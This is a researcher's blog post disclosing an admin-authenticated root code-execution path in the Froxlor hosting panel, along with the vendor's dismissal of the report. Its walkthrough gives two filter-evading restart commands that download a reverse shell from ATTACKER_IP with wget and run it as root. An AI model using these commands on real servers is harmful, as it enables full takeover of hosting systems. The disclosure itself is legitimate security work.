
Disclosing Froxlor V2.x Authenticated RCE as Root Vulnerability via PHP-FPM

A story of a vulnerability in Froxlor that allowed authenticated remote code execution as root. This vulnerability exists on the latest version of Froxlor, including v2.x.


I was playing one of the recent CTFs on HackTheBox and the challenge involved getting admin credentials for a Froxlor instance. The intended way was to enumerate the Froxlor instance and moving on from there. However, I noticed a way to getting a root shell exploiting an unknown vulnerability in Froxlor. This post will detail the vulnerability and the steps I took to exploit it, along with a PoC and exploit code.


Froxlor is an open-source server management panel that allows users to manage web hosting services. It is written in PHP and uses MySQL as a database backend. Froxlor is used by many hosting providers to manage their servers and services.

Though it’s a server management panel, it doesn’t provide intentionally a way to execute arbitrary code on the server as root, not even as www-data.


The vulnerability I found in Froxlor is an authenticated remote code execution as root. An attacker who has admin credentials can exploit this vulnerability to execute arbitrary code on the server as root.

After I found the vulnerability, I immediately went to the Froxlor GitHub repository and thought of reporting it. However, I found out that they are not accepting any security reports related to privileged users.

Froxlor Security Policy

Okay, then I decided to contact the Froxlor team via Discord and they were maddeningly defensive about the issue. They said that it’s not a vulnerability and it’s a feature. I told them I explored this in a CTF challenge and they even mocked me for that.

Froxlor Discord Chat

Okay, let us introduce the public to this feature then.


Froxlor allows admin users to set custom PHP-FPM restart commands in the panel. Of course, this is a feature and it’s intended to be used for restarting PHP-FPM services. However, the is not sanitized properly and an attacker can bypass the sanitization and execute arbitrary commands on the server as root.


Step 1: Get Admin Credentials

After getting admin credentials, login to the Froxlor panel.

Step 2: Set Custom PHP-FPM Restart Command

Go to PHP -> PHP-FPM versions and set a custom PHP-FPM restart command as shown in the image below.

PHP-FPM Restart Command

This input is highly sanitized, it doesn’t allow many characters including ;, &, |, >, <, //. However, we can still transfer a reverse shell to the server using wget and after that, we can execute the reverse shell. So two commands are needed to exploit this vulnerability.

First: wget ATTACKER_IP/ -O /tmp/

Second: /bin/bash /tmp/

As seen, we didn’t use any of the restricted characters to execute the reverse shell.

Step 3: Restart PHP-FPM

After setting the custom PHP-FPM restart command, go to System -> Settings and click on PHP-FPM. After that, click on disable, wait for a few seconds, and click on enable. This will restart the PHP-FPM service and execute the reverse shell.

Restart PHP-FPM

Due to cron jobs, the PHP-FPM service restarts every 5 minutes, so you need to wait a few minutes to get the reverse shell. Furthermore, it’s a constant-time operation, meaning it always runs at 5-minute intervals, like 12:05, 12:10, 12:15, etc.

Step 4: Get a Root Shell

After executing the reverse shell, you will get a root shell on the server, even though the service is running as www-data.

Root Shell

PoC Video

I have created a PoC for this vulnerability. You can watch the video below to see the PoC in action. The reason it’s a bit of a long video is that almost %95 of the video is waiting for the PHP-FPM service to restart. But you’ll get a root shell at the end, so it’s worth watching.

Exploit Code

I have also created a Python script to exploit this vulnerability. You can visit the GitHub repository to inspect the exploit code.


This vulnerability in Froxlor allows an attacker to execute arbitrary code on the server as root. The vulnerability is due to improper sanitization of the custom PHP-FPM restart command. The Froxlor team doesn’t consider this a vulnerability and they are not accepting any security reports related to privileged users. However, I believe that this is something worthy for penetration testers and security researchers to know about. You can’t just ignore a direct root shell on a server.

This post is licensed under CC BY 4.0 by the author.